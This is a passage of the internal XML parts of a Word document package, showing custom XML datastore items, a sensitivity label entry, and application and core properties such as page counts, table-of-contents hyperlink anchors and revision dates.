<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9F623C11-39F0-441E-90A4-F776B7926563}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="4e3132c7-a2f3-42f9-84ee-56b25104e8a3"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8CAA659C-416A-4D8A-80A6-6A08A90B5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3132c7-a2f3-42f9-84ee-56b25104e8a3"/>
    <ds:schemaRef ds:uri="0cba1d9c-1801-47b8-aafb-7327be6ae7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F751D2-AEC8-4C43-A51B-ACE900681FE9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
<clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
  <clbl:label id="{9f5c8052-b1ea-40d1-8cd5-ea0c204ca84f}" enabled="1" method="Privileged" siteId="{19e51c11-d919-4a98-899d-9b9dc33f4e04}" removed="0"/>
</clbl:labelList>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>59</TotalTime>
  <Pages>8</Pages>
  <Words>1939</Words>
  <Characters>10669</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12583</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="72" baseType="variant">
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822449</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822448</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822447</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822446</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822445</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822444</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822443</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822442</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822441</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1048625</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822440</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507377</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822439</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507377</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc196822438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Mahé FAUVART</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <cp:lastPrinted>2025-04-23T10:16:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-07T06:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T09:04:00Z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0x0101002AABC34BFD7C5D4685D4B72BD5549D01</vt:lpwstr>
  </property>
</Properties>
</file>